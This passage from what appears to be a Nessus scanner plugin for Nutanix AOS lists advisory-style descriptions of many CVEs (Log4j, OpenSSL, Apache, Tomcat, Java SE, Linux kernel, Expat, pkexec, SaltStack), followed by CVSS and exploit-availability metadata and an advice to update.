2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to\n log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-\n default configurations. 
This could allow attackers with control over Thread Context Map (MDC) input data\n when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissible length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. 
However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. 
Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that\n load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3\n (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35561)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Keytool). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to\n some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2021-35564)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. 
Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). 
Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. 
This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from\n uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread\n Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed\n in Log4j 2.17.0, 2.12.3, and 2.3.1. (CVE-2021-45105)\n\n - In various methods of hid-multitouch.c, there is a possible out of bounds write due to a missing bounds\n check. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-162844689References: Upstream kernel (CVE-2020-0465)\n\n - In do_epoll_ctl and ep_loop_check_proc of eventpoll.c, there is a possible use after free due to a logic\n error. This could lead to local escalation of privilege with no additional execution privileges needed.\n User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:\n A-147802478References: Upstream kernel (CVE-2020-0466)\n\n - In unix_scm_to_skb of af_unix.c, there is a possible use after free bug due to a race condition. This\n could lead to local escalation of privilege with System execution privileges needed. User interaction is\n not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196926917References:\n Upstream kernel (CVE-2021-0920)\n\n - A flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in\n the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the\n system. 
This flaw affects all the Linux kernel versions starting from 3.13. (CVE-2021-3564)\n\n - A use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way\n user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev()\n together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(),\n hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their\n privileges on the system. This flaw affects the Linux kernel versions prior to 5.13-rc5. (CVE-2021-3573)\n\n - A use-after-free flaw was found in the Linux kernel's Bluetooth subsystem in the way user calls connect to\n the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the\n system or escalate their privileges. The highest threat from this vulnerability is to confidentiality,\n integrity, as well as system availability. (CVE-2021-3752)\n\n - A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size\n increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS\n filesystem otherwise not accessible to them. (CVE-2021-4155)\n\n - A random memory access flaw was found in the Linux kernel's GPU i915 kernel driver functionality in the\n way a user may run malicious code on the GPU. This flaw allows a local user to crash the system or\n escalate their privileges on the system. (CVE-2022-0330)\n\n - A use-after-free flaw was found in the Linux kernel's vmw_execbuf_copy_fence_user function in\n drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx. This flaw allows a local attacker with user privileges\n to cause a privilege escalation problem. (CVE-2022-22942)\n\n - A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed\n by OpenLDAP's slapd server, to trigger an assertion failure. 
The highest threat from this vulnerability is\n to system availability. (CVE-2020-25709)\n\n - A flaw was found in OpenLDAP in versions before 2.4.56. This flaw allows an attacker who sends a malicious\n packet processed by OpenLDAP to force a failed assertion in csnNormalize23(). The highest threat from this\n vulnerability is to system availability. (CVE-2020-25710)\n\n - When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to\n 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the\n server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is\n configured with sessionAttributeValueClassNameFilter=null (the default unless a SecurityManager is used)\n or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker\n knows the relative file path from the storage location used by FileStore to the file the attacker has\n control over; then, using a specifically crafted request, the attacker will be able to trigger remote code\n execution via deserialization of the file under their control. Note that all of conditions a) to d) must\n be true for the attack to succeed. (CVE-2020-9484)\n\n - The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat\n 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local\n attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue\n is only exploitable when Tomcat is configured to persist sessions using the FileStore. (CVE-2022-23181)\n\n - An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-\n free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is\n called, aka CID-f5449e74802c. 
(CVE-2020-36385)\n\n - In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server\n could cause a heap overflow (CVE-2021-26691)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser\n (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the\n vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and\n earlier. (CVE-2021-44790)\n\n - A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an\n attacker who can convince a victim to install a seemingly verifiable package, whose signature header was\n modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is\n to data integrity, confidentiality, and system availability. (CVE-2021-20271)\n\n - In Cyrus SASL 2.1.17 through 2.1.27 before 2.1.28, plugins/sql.c does not escape the password for a SQL\n INSERT or UPDATE statement. (CVE-2022-24407)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. 
This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is\n a setuid tool designed to allow unprivileged users to run commands as privileged users according\n predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly\n and ends trying to execute environment variables as commands. An attacker can leverage this by crafting\n environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully\n executed the attack can cause a local privilege escalation given unprivileged users administrative rights\n on the target machine. (CVE-2021-4034)\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. 
Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered\n discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and\n source_hash URLs can gain full file system access as root on a salt minion. (CVE-2021-21996)\n\n - In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in\n xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).\n (CVE-2021-45960)\n\n - In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for\n m_groupSize. 
(CVE-2021-46143)\n\n - addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22822)\n\n - build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22823)\n\n - defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22824)\n\n - lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22825)\n\n - nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with\n a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks\n for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters\n into namespace URIs. (CVE-2022-25236)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. 
An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. 
Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data\n which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when\n listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.\n (CVE-2019-17571)\n\n - Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an\n SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent\n through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 (CVE-2020-9488)\n\n - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker\n has write access to the Log4j configuration or if the configuration references an LDAP service the\n attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing\n JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to\n CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which\n is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2\n as it addresses numerous other issues from the previous versions. (CVE-2022-23302)\n\n - By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the\n values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be\n included. 
This allows attackers to manipulate the SQL by entering crafted strings into input fields or\n headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue\n only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.\n Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized\n SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2022-23305)\n\n - CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw\n V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists. (CVE-2022-23307)\n\n - A flaw memory leak in the Linux kernel performance monitoring subsystem was found in the way if using\n PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of\n service. (CVE-2020-25704)\n\n - An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka\n CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system\n crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as\n CVE-2021-28950. (CVE-2020-36322)\n\n - A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user\n calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or\n escalate privileges on the system. The highest threat from this vulnerability is to confidentiality,\n integrity, as well as system availability. (CVE-2021-42739)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. 
The salt-master process\n ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user tokens from the salt master and/or run\n arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process\n ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-1-1.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
